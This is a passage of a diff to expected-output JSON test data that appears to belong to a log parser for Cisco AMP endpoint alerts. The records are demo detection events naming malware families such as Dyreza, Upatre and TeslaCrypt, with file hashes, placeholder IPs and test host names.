"file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 251240, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667837389570068", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 689000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667837389570000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 252559, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258066518900808", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 608000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258066518901000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 253878, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258014979293255", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 581000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258014979293000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 255197, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257963439685702", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 569000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176257963439686000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 256516, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:12:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667579691532307", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 778000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 900000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667579691532000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 257835, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 22893, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4353,64 +700,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55807, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:52.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667575396565008", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006658", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 971000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 869000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667575396565000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 261804, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 24346, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4418,61 +772,61 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55806, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:49.000Z", + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "27:85:29:21:67:49" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257843180601413", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "27:85:29:21:67:49" ], - "cisco.amp.timestamp_nanoseconds": 536000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", "event.category": [ - "file", - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 6176257843180601000, + "event.id": 1476910664322001000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 263122, + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Command_Line_Arguments_Meterpreter" ], "related.ip": [ "8.8.8.8", @@ -4485,43 +839,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:48.000Z", + "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648166, + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 82375000, - "event.action": "Uninstall", "event.dataset": "cisco.amp", - "event.id": 834324, + "event.id": 6533671385032557000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 264441, + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], "related.hosts": [ - "Demo_AMP_Exploit_Prevention" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4529,55 +906,50 @@ ] }, { - "@timestamp": "2021-01-15T10:12:37.000Z", + "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257791640993860", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 898000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257791640994000, + "event.id": 1489955900329000200, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 265349, + "log.offset": 28756, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_Dyre" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", @@ -4590,60 +962,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:25.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 901000000, + "cisco.amp.timestamp_nanoseconds": 947000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257740101386000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 266668, + "log.offset": 30055, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4651,60 +1029,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:13.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 874000000, + "cisco.amp.timestamp_nanoseconds": 926000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257688561779000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 267987, + "log.offset": 31381, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4712,60 +1094,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:02.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 236000000, + "cisco.amp.timestamp_nanoseconds": 533000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257641317138000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 